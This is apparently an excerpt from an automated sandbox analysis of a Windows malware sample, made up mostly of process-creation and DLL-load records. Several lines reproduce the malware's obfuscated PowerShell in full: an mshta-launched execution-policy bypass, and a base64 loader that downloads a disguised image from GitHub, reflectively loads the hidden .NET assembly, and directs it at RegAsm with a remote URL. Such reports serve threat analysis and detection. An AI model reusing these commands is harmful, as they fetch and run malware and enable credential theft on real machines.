Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
